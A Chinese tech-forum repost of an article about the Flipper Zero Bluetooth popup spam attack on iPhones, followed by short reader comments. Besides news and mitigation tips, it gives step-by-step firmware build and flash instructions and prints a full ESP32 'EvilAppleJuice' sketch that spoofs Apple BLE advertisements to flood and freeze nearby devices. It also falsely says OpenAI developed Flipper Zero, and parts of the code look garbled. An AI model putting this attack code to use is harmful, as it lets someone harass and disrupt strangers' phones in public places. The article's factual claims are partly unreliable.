eric_wang 发表于 2023-12-25 16:59

苹果被爆惊天漏洞,黑客盯上了这个功能

<p data-mpa-powered-by="yiban.io">&nbsp;</p>

<div style="text-align: center;"></div>

<p>&nbsp;</p>

<section>&nbsp;</section>

<section>你用的苹果手机还是安卓手机?最近,一种廉价黑客设备席卷国外,这种设备能够在50米范围内,轻松骚扰你的苹果设备,而它却只卖199美元。</section>

<section>这一次,苹果用户又成为了受害者。</section>

<section>
<div style="text-align: center;">&nbsp;</div>
<strong>&nbsp;黑客盯上了你的蓝牙<strong>&nbsp;</strong></strong>

<p line="R4Hd" ql-global-para="true">&nbsp;</p>
</section>

<section>不知道你有没有遇到过这种情况,当你在地铁里,开心地用iPhone或者iPad看小说、新闻,忽然出现一个弹窗,提示&ldquo;不是你的AirPods&rdquo;。当你随手关掉,随手手机又立即跳出一个弹窗。此时,你只是以为谁在玩AirPods盒子。</section>

<section>但紧接着,你的iPhone/iPad不仅跳出AirPods弹窗,还有AriPods Pro、AirPods Max、Apple TV、色彩平衡。</section>

<section>此时,你发现,你已经被黑客盯上了,向你的iPhone发起了弹窗攻击。</section>

<section>
<div style="text-align: center;"></div>
</section>

<section>图片来源丨B站UP主月朗脑洞大</section>

<section>事实上,这种情况要追溯到今年9月。</section>

<section>据9to5Mac报道,一款专为硬件爱好者设计的号称是&ldquo;渗透测试员和业余爱好者的工具箱&rdquo;Flipper Zero今年9月首次亮相,它能够写入代码从而控制各种协议。</section>

<section>当黑客将利用蓝牙低功耗(BLE)配对序列缺陷的特定代码加载到Flipper Zero上时,该设备可以执行DoS攻击,为就近的iPhone发送大量蓝牙弹窗信息,导致相关设备处于冻结状态数分钟,之后重新启动。</section>

<section>据悉,Flipper Zero的蓝牙无线电范围约为164英尺(约50米),因此黑客通常是就近发起DoS攻击,从而在不被检测到的情况下对咖啡店和体育赛事造成严重破坏。</section>

<section>9to5Mac同时提到,苹果至今仍然没有办法未完全修复该Bug,用户唯一能做的就是在设置中禁用蓝牙,而苹果也尚未承认正在被黑客利用的蓝牙低功耗(BLE)配对序列缺陷,外媒认为,&ldquo;原因可能是技术性的&rdquo;。</section>

<section>
<div style="text-align: center;"></div>
</section>

<section>
<p line="R4Hd" ql-global-para="true">&nbsp;</p>
<strong>&nbsp;碟中谍,黑客中的黑客<strong>&nbsp;</strong></strong>

<p>&nbsp;</p>
</section>

<section>Flipper Zero的故事要追溯到2016年,当时加密货币迫切需要安全可靠的硬件解决方案存储和使用加密密钥,为了当时的满足需求,OpenAI耗时多年开发一种硬件安全设备,最终在2020年发布,它就是Flipper Zero。</section>

<section>Flipper Zero的设计灵感来自赛博朋克电影《Johnny Mnemonic》(捍卫机密)中的 Cybernetic Dolphin(一只曾经被海军技术增强过的海豚,最终成为一名黑客);现在,它是极客的瑞士军刀和黑客的电子鸡。</section>

<section>由于产品设计理念很酷,Flipper Zero自带传播属性,获得了大量忠实的用户。</section>

<section>Flipper Zero的联合创始人之一亚历山大&middot;库拉金(Alexander Kulagin)表示:&ldquo;我们成功推出Flipper Zero的一个原因是,如今每个人都想成为黑客,但不是每个人都知道如何成为黑客, 我们想表明,黑客实际上是每天都在使用的,它不是什么坏事,只是一套和其他任何事情一样的技能。&rdquo;</section>

<section>
<div style="text-align: center;"></div>
</section>

<section>Flipper Zero的初衷本身就是为评估和加强电子系统安全性,所以渗透测试、数字取证和硬件黑客都是它的强项。而在国外的网购平台上,它也很容易获取。</section>

<section>
<div style="text-align: center;"></div>
</section>

<section>比较离谱的是,随着Flipper Zero社区人数快速增加,Flipper Zero不仅曾经一度供不应求,一些犯罪分子还针对这部分人群进行精准的网络钓鱼攻击。这一拨,属于是碟中谍了,&ldquo;黑客&rdquo;一家也被端了。</section>

<section>安全人员就曾在推特上发现了3个假的Flipper Zero推特(X)账户,以及2个假的FIFPER官方商店。假账户使用的名字中的大写字母&quot;i&quot;,看起来就像推特上的&quot;l&quot;,并且也没有进行企业认证。</section>

<section>假的Flipper Zero官方商城,不仅做得比真正的官方商店更逼真,标价也与真实官方一致,当用户选择购买时会被重定向至一个假的结账页面,同样是仿造真实商店的样子,并且需要输入电子邮件、姓名和收件地址。当你选择付款的那一刹那,很明显你的钱被骗了,而且个人信息还被泄露了。</section>

<section>
<div style="text-align: center;"></div>
</section>

<section>
<p line="R4Hd" ql-global-para="true">&nbsp;</p>

<div style="text-align: center;">&nbsp;</div>
<strong>&nbsp;这是怎么实现的?<strong>&nbsp;</strong></strong></section>

<section>&nbsp;</section>

<section>言归正传,这样的功能究竟是如何实现的?</section>

<section>在硬件层面,Flipper Zero的构成并不复杂,包括电池、usb、micro SD reader、蜂鸣器、天线、125kHz RFID阅读器和模拟器、NFC阅读器和模拟器、sub-1 GHz模块、blutooth模块、红外模块、振动马达、256kb RAM、iButton。</section>

<section>最为关键的是,Flipper Zero支持各种物联网协议,它可以模拟无线电、NFC、RFID等各种类别的信息,并测试其他设备的通信功能。不仅能当遥控器、复制门禁卡,还能变成&ldquo;黑客工具&rdquo;,克隆车钥匙、通过蓝牙发送垃圾信息,甚至控制重要系统访问权限。并且它的硬件100%开源,官网还提供固件源代码、原理图、跨平台SDK和桌面&amp;移动工具。你可以以喜欢的方式对其进行改造和扩展,从而实现这些不同寻常的功能。</section>

<ul>
        <li>
        <section><strong>低于1GHz收发器</strong></section>
        </li>
</ul>

<section>
<div style="text-align: center;"></div>
</section>

<section>例如车库门遥控器、围栏、物联网传感器和远程无钥匙系统。因其集成的多频段天线和 CC1101芯片,有效距离可达50米。CC1101是一款通用收发器,专为极低功耗无线应用而设计。它支持2-FSK、4-FSK、GFSK和MSK等多种类型的数字调制,以及OOK和灵活的ASK整形。您可以在应用程序中执行任何数字通信,例如连接到物联网设备和访问控制系统。</section>

<section>
<div style="text-align: center;"></div>
</section>

<ul>
        <li>
        <section><strong>125kHz射频识别</strong></section>
        </li>
</ul>

<section>125kHz天线位于Flipper Zero底部,它可以读取低频感应卡并将其保存到内存中以便稍后进行模拟。从而打开部分门禁系统。因为早期一些门禁系统只存储一个N字节的ID,并且没有身份验证机制,允许任何人读取、克隆和模拟。&nbsp;</section>

<section>
<div style="text-align: center;"></div>
</section>

<ul>
        <li>
        <section><strong>高频感应卡</strong></section>
        </li>
</ul>

<section>Flipper Zero还内置NFC模块 (13.56MHz)。与 125kHz RFID模块一起,它将Flipper Zero变成可在低频 (LF) 和高频 (HF) 范围内运行的终极RFID设备。NFC模块支持所有主要标准。它的工作原理与125kHz模块几乎相同,允许您与支持NFC的设备交互 - 读取、写入和模拟HF标签。</section>

<section>
<div style="text-align: center;"></div>
</section>

<ul>
        <li>
        <section><strong>蓝牙</strong></section>
        </li>
</ul>

<section>就是前面提到的,Flipper Zero可以与BLE协议交互,更具体地说,是模仿或欺骗这些广播数据包。</section>

<h1>&nbsp;</h1>

<section>
<div style="text-align: center;"></div>
</section>

<section>当像Flipper Zero这样的设备模仿合法设备或服务的广播数据包时,它可以在iOS用户附近创建大量的虚拟设备。想象一下,在搜索要连接的设备时,出现了一个由数十个(如果不是数百个)假设备名称组成的列表。或者尝试AirDrop,却被虚假的收件人淹没。</section>

<section>知道了这些,我们又如何在Flipper Zero上操作?</section>

<p>&nbsp;</p>

<div style="text-align: center;"></div>

<p>&nbsp;</p>

<section>&nbsp;</section>

<section>通过修改负责蓝牙功能的特定文件来更新Flipper Zero,然后编译并应用固件更新。</section>

<section>首先要先下载官方框架代码</section>

<section>git clone&nbsp;<a href="https://github.com/flipperdevices/flipperzero-firmware.git" target="_blank">https://github.com/flipperdevices/flipperzero-firmware.git</a></section>

<section>举个例子,我们这里使用 Apple AirTag(代码已更新GitHub)</section>

<section><a href="https://github.com/h0e4a0r1t/FlipperZero_Annoying_Apple/" target="_blank">https://github.com/h0e4a0r1t/FlipperZero_Annoying_Apple/</a></section>

<section>更新&ldquo;gap.c&rdquo;文件,然后编译更新的固件。</section>

<pre>
&nbsp;</pre>

<section>./fbt COMPACT=1 DEBUG=0 VERBOSE=1 updater_packagebr</section>

<section>
<div style="text-align: center;"></div>
</section>

<section>编译好的固件在这个文件夹下</section>

<section>
<div style="text-align: center;"></div>
</section>

<section>
<div style="text-align: center;"></div>
</section>

<section>之后使用qFlipper,通过Install from file 将编译好的固件上传上去进行更新</section>

<section>
<div style="text-align: center;"></div>
</section>

<section>更新成功以后,打开Settings选项</section>

<section>
<div style="text-align: center;"></div>
</section>

<section>打开Bluetooth 选项设置蓝牙</section>

<section>
<div style="text-align: center;"></div>
</section>

<section>将OFF调成ON,打开蓝牙</section>

<section>
<div style="text-align: center;"></div>
</section>

<section>附近的iPhone就会收到提醒</section>

<section>
<div style="text-align: center;"></div>
</section>

<section>当然,如果你没有Flipper Zero也无所谓,现在它本身已经是一个github开源项目,名字为&nbsp;&ldquo;evil applejuice&rdquo;,10块钱买个esp32就能刷,甚至不用开发板,安卓就能模拟。B站就有UP用华强北promax ultra+改造出了这样的项目。</section>

<section>
<div style="text-align: center;"></div>
</section>

<section>图片来源丨B站UP主月朗脑洞大</section>

<pre>

&nbsp;</pre>

<section>开源地址:<a href="https://github.com/ckcr4lyf/EvilAppleJuice-ESP32" target="_blank">https://github.com/ckcr4lyf/EvilAppleJuice-ESP32</a></section>

<h1>&nbsp;</h1>

<section>部分代码:</section>

<section>
<pre>
<code>// This example takes heavy inpsiration from the ESP32 example by ronaldstoner
// Based on the previous work of chipik / _hexway / ECTO-1A &amp; SAY-10
// See the README for more info
#include &lt;Arduino.h&gt;
#include &lt;BLEDevice.h&gt;
#include &lt;BLEUtils.h&gt;
#include &lt;BLEServer.h&gt;

BLEAdvertising *pAdvertising;// global variable
uint32_t delayMilliseconds = 1000;

/*
These are audio devices: wireless headphones / earbuds
It seems these need a shorter range between ESP &amp; iDevice
*/
const uint8_t DEVICES[] = {
// Airpods
{0x1e, 0xff, 0x4c, 0x00, 0x07, 0x19, 0x07, 0x02, 0x20, 0x75, 0xaa, 0x30, 0x01, 0x00, 0x00, 0x45, 0x12, 0x12, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
// Airpods Pro
{0x1e, 0xff, 0x4c, 0x00, 0x07, 0x19, 0x07, 0x0e, 0x20, 0x75, 0xaa, 0x30, 0x01, 0x00, 0x00, 0x45, 0x12, 0x12, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
// Airpods Max
{0x1e, 0xff, 0x4c, 0x00, 0x07, 0x19, 0x07, 0x0a, 0x20, 0x75, 0xaa, 0x30, 0x01, 0x00, 0x00, 0x45, 0x12, 0x12, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
// Airpods Gen 2
{0x1e, 0xff, 0x4c, 0x00, 0x07, 0x19, 0x07, 0x0f, 0x20, 0x75, 0xaa, 0x30, 0x01, 0x00, 0x00, 0x45, 0x12, 0x12, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
// Airpods Gen 3
{0x1e, 0xff, 0x4c, 0x00, 0x07, 0x19, 0x07, 0x13, 0x20, 0x75, 0xaa, 0x30, 0x01, 0x00, 0x00, 0x45, 0x12, 0x12, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
// Airpods Pro Gen 2
{0x1e, 0xff, 0x4c, 0x00, 0x07, 0x19, 0x07, 0x14, 0x20, 0x75, 0xaa, 0x30, 0x01, 0x00, 0x00, 0x45, 0x12, 0x12, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
// Power Beats
{0x1e, 0xff, 0x4c, 0x00, 0x07, 0x19, 0x07, 0x03, 0x20, 0x75, 0xaa, 0x30, 0x01, 0x00, 0x00, 0x45, 0x12, 0x12, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
// Power Beats Pro
{0x1e, 0xff, 0x4c, 0x00, 0x07, 0x19, 0x07, 0x0b, 0x20, 0x75, 0xaa, 0x30, 0x01, 0x00, 0x00, 0x45, 0x12, 0x12, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
// Beats Solo Pro
{0x1e, 0xff, 0x4c, 0x00, 0x07, 0x19, 0x07, 0x0c, 0x20, 0x75, 0xaa, 0x30, 0x01, 0x00, 0x00, 0x45, 0x12, 0x12, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
// Beats Studio Buds
{0x1e, 0xff, 0x4c, 0x00, 0x07, 0x19, 0x07, 0x11, 0x20, 0x75, 0xaa, 0x30, 0x01, 0x00, 0x00, 0x45, 0x12, 0x12, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
// Beats Flex
{0x1e, 0xff, 0x4c, 0x00, 0x07, 0x19, 0x07, 0x10, 0x20, 0x75, 0xaa, 0x30, 0x01, 0x00, 0x00, 0x45, 0x12, 0x12, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
// Beats X
{0x1e, 0xff, 0x4c, 0x00, 0x07, 0x19, 0x07, 0x05, 0x20, 0x75, 0xaa, 0x30, 0x01, 0x00, 0x00, 0x45, 0x12, 0x12, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
// Beats Solo 3
{0x1e, 0xff, 0x4c, 0x00, 0x07, 0x19, 0x07, 0x06, 0x20, 0x75, 0xaa, 0x30, 0x01, 0x00, 0x00, 0x45, 0x12, 0x12, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
// Beats Studio 3
{0x1e, 0xff, 0x4c, 0x00, 0x07, 0x19, 0x07, 0x09, 0x20, 0x75, 0xaa, 0x30, 0x01, 0x00, 0x00, 0x45, 0x12, 0x12, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
// Beats Studio Pro
{0x1e, 0xff, 0x4c, 0x00, 0x07, 0x19, 0x07, 0x17, 0x20, 0x75, 0xaa, 0x30, 0x01, 0x00, 0x00, 0x45, 0x12, 0x12, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
// Betas Fit Pro
{0x1e, 0xff, 0x4c, 0x00, 0x07, 0x19, 0x07, 0x12, 0x20, 0x75, 0xaa, 0x30, 0x01, 0x00, 0x00, 0x45, 0x12, 0x12, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
// Beats Studio Buds Plus
{0x1e, 0xff, 0x4c, 0x00, 0x07, 0x19, 0x07, 0x16, 0x20, 0x75, 0xaa, 0x30, 0x01, 0x00, 0x00, 0x45, 0x12, 0x12, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
};

/*
These are more general home devices
It seems these can work over long distances, especially AppleTV Setup
*/
const uint8_t SHORT_DEVICES[] = {
// AppleTV Setup
{0x16, 0xff, 0x4c, 0x00, 0x04, 0x04, 0x2a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0xc1, 0x01, 0x60, 0x4c, 0x95, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00},
// AppleTV Pair
{0x16, 0xff, 0x4c, 0x00, 0x04, 0x04, 0x2a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0xc1, 0x06, 0x60, 0x4c, 0x95, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00},
// AppleTV New User
{0x16, 0xff, 0x4c, 0x00, 0x04, 0x04, 0x2a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0xc1, 0x20, 0x60, 0x4c, 0x95, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00},
// AppleTV AppleID Setup
{0x16, 0xff, 0x4c, 0x00, 0x04, 0x04, 0x2a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0xc1, 0x2b, 0x60, 0x4c, 0x95, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00},
// AppleTV Wireless Audio Sync
{0x16, 0xff, 0x4c, 0x00, 0x04, 0x04, 0x2a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0xc1, 0xc0, 0x60, 0x4c, 0x95, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00},
// AppleTV Homekit Setup
{0x16, 0xff, 0x4c, 0x00, 0x04, 0x04, 0x2a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0xc1, 0x0d, 0x60, 0x4c, 0x95, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00},
// AppleTV Keyboard Setup
{0x16, 0xff, 0x4c, 0x00, 0x04, 0x04, 0x2a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0xc1, 0x13, 0x60, 0x4c, 0x95, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00},
// AppleTV Connecting to Network
{0x16, 0xff, 0x4c, 0x00, 0x04, 0x04, 0x2a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0xc1, 0x27, 0x60, 0x4c, 0x95, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00},
// Homepod Setup
{0x16, 0xff, 0x4c, 0x00, 0x04, 0x04, 0x2a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0xc1, 0x0b, 0x60, 0x4c, 0x95, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00},
// Setup New Phone
{0x16, 0xff, 0x4c, 0x00, 0x04, 0x04, 0x2a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0xc1, 0x09, 0x60, 0x4c, 0x95, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00},
// Transfer Number
{0x16, 0xff, 0x4c, 0x00, 0x04, 0x04, 0x2a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0xc1, 0x02, 0x60, 0x4c, 0x95, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00},
// TV Color Balance
{0x16, 0xff, 0x4c, 0x00, 0x04, 0x04, 0x2a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0xc1, 0x1e, 0x60, 0x4c, 0x95, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00},
};

void setup() {
Serial.begin(115200);
Serial.println("Starting ESP32 BLE");

BLEDevice::init("AirPods 69");

// Create the BLE Server
BLEServer *pServer = BLEDevice::createServer();
pAdvertising = pServer-&gt;getAdvertising();

// seems we need to init it with an address in setup() step.
esp_bd_addr_t null_addr = {0xFE, 0xED, 0xC0, 0xFF, 0xEE, 0x69};
pAdvertising-&gt;setDeviceAddress(null_addr, BLE_ADDR_TYPE_RANDOM);
}

void loop() {

// First generate fake random MAC
esp_bd_addr_t dummy_addr = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
for (int i = 0; i &lt; 6; i++){
    dummy_addr = random(256);

    // It seems for some reason first 4 bits
    // Need to be high (aka 0b1111), so we
    // OR with 0xF0
    //if (i == 0){
      //dummy_addr |= 0xF0;
    //}
}

BLEAdvertisementData oAdvertisementData = BLEAdvertisementData();

// Randomly pick data from one of the devices
// First decide short or long
// 0 = long (headphones), 1 = short (misc stuff like Apple TV)
int device_choice = random(2);
//int device_choice = 1;
if (device_choice == 0){
    int index = random(17);
    oAdvertisementData.addData(std::string((char*)DEVICES, 31));
} else {
    int index = random(12);
    oAdvertisementData.addData(std::string((char*)SHORT_DEVICES, 23));
}

/*Page 191 of Apple's "Accessory Design Guidelines for Apple Devices (Release R20)" recommends to use only one of
      the three advertising PDU types when you want to connect to Apple devices.
          // 0 = ADV_TYPE_IND,
          // 1 = ADV_TYPE_SCAN_IND
          // 2 = ADV_TYPE_NONCONN_IND

      Randomly using any of these PDU types may increase detectability of spoofed packets.

      What we know for sure:
      - AirPods Gen 2: this advertises ADV_TYPE_SCAN_IND packets when the lid is opened and ADV_TYPE_NONCONN_IND when in pairing mode (when the rear case btton is held).
                        Consider using only these PDU types if you want to target Airpods Gen 2 specifically.
*/

int adv_type_choice = random(3);
if (adv_type_choice == 0){
    pAdvertising-&gt;setAdvertisementType(ADV_TYPE_IND);
} else if (adv_type_choice == 1){
    pAdvertising-&gt;setAdvertisementType(ADV_TYPE_SCAN_IND);
} else {
    pAdvertising-&gt;setAdvertisementType(ADV_TYPE_NONCONN_IND);
}

// Set the device address, advertisement data
pAdvertising-&gt;setDeviceAddress(dummy_addr, BLE_ADDR_TYPE_RANDOM);
pAdvertising-&gt;setAdvertisementData(oAdvertisementData);

// Set advertising interval
/*According to Apple' Technical Q&amp;A QA1931 (https://developer.apple.com/library/archive/qa/qa1931/_index.html), Apple recommends
      an advertising interval of 20ms to developers who want to maximize the probability of their BLE accessories to be discovered by iOS.

      These lines of code fixes the interval to 20ms. Enabling these MIGHT increase the effectiveness of the DoS. Note this has not undergone thorough testing.
*/

//pAdvertising-&gt;setMinInterval(0x20);
//pAdvertising-&gt;setMaxInterval(0x20);
//pAdvertising-&gt;setMinPreferred(0x20);
//pAdvertising-&gt;setMaxPreferred(0x20);

// Start advertising
Serial.println("Sending Advertisement...");
pAdvertising-&gt;start();
delay(delayMilliseconds); // delay for delayMilliseconds ms
pAdvertising-&gt;stop();
}</code></pre>

<p>&nbsp;</p>
</section>

<p><strong>不必过分焦虑<strong>&nbsp;</strong></strong></p>

<section>
<p line="R4Hd" ql-global-para="true">&nbsp;</p>
</section>

<section>相比于Flipper Zero的测试功能,越来越多人开始把它当作&ldquo;犯罪工具&rdquo;来使用。不过也不必过分焦虑。</section>

<section>目前,亚马逊多个站点已将&ldquo;Flipper Zero&rdquo;列为禁售产品。理由是其是一款盗卡设备,可以用来开启房间门锁、解锁汽车、拦截蓝牙讯号,以及电脑存取资料等。</section>

<section>苹果日前也发布了iOS 17.2更新,虽然没能彻底解决这个问题,但已经缓解了Flipper Zero 造成的相关漏洞,升级到iOS 17.2之后,弹窗依然会出现,但已经明显缓解攻击破坏力,不会导致锁定等崩溃情况。</section>

<section>EEWORLDIMGTK29</section>

<section>国内相关平台,前阵子封禁了这种设备,不过,现在又也能够搜索到这种产品了。</section>

<section>EEWORLDIMGTK30</section>

<section>当然了,也有网友支招,可以自行在iPhone、iPad上设置只弹出已信任设备。(勾选&ldquo;24小时内不弹出&rdquo;没有效果,它相当于每次弹窗都是连接新设备)</section>

<section>如果你还觉得不放心,关闭蓝牙是最好的选择了。(也只能这样了)</section>

<p>&nbsp;</p>

<section>
<section>
<section>
<p><strong>参考文献</strong></p>
</section>
</section>
</section>

<section powered-by="xiumi.us">
<section>
<section>
<section powered-by="xiumi.us">
<section>
<p>&nbsp;</p>

<p line="x8zT" ql-global-para="true"> IT之家:漏洞曝光 2 月仍未修复,黑客工具 Flipper Zero 至今仍可制造蓝牙弹窗崩溃 iPhone / iPad.2023.11.20.https://www.ithome.com/0/733/641.htm</p>

<p line="nMrL" ql-global-para="true"> Bilibili:惹恼苹果用户:FlipperZero蓝牙恶作剧.https://www.bilibili.com/read/cv26449696/</p>

<p line="onIE" ql-global-para="true"> Bilibili月朗脑洞大:https://www.bilibili.com/video/BV1f64y157i2</p>

<p line="H0ty" ql-global-para="true"> Engadget:https://www.engadget.com/flipper-zero-tamagotchi-hacking-game-175949581.html</p>

<p line="NaV1" ql-global-para="true"> FreeBuf:这个被禁售的黑客小工具,曾让苹果用户崩溃.2023.12.19.<a data-linktype="2" href="https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&amp;mid=2651251433&amp;idx=1&amp;sn=d25ec5ecd860fe957a1de7b4836ecdda&amp;scene=21#wechat_redirect" ql-global="true" rel="noopener noreferrer nofollow" target="_blank">https://mp.weixin.qq.com/s/LFy8k2jxNLnhirgiFSnfHA</a></p>

<p>&nbsp;</p>
</section>
</section>
</section>
</section>
</section>

<p>&nbsp;</p>

吾妻思萌 发表于 2023-12-26 06:37

好玩啊,国内就没有呀

极限零 发表于 2023-12-26 09:25

<p>蓝牙确实需要更换了,时间太长了,通讯速率低,而且协议也被研究透了</p>

<p>机密部门禁无线还是有道理的</p>

极限零 发表于 2023-12-26 10:11

<p>开源的看了看,只能向IPHONE弹窗啊,没有RFID复制功能啊,小区大门需要啊</p>

秦天qintian0303 发表于 2023-12-27 17:25

<p>无线也是需要走硬件的,所以谁都能看一遍&nbsp;&nbsp;</p>

MrCU204 发表于 2024-11-27 08:27

<p><span style="color:#003900;">蓝牙我是永远关着的</span></p>
页: [1]
查看完整版本: 苹果被爆惊天漏洞,黑客盯上了这个功能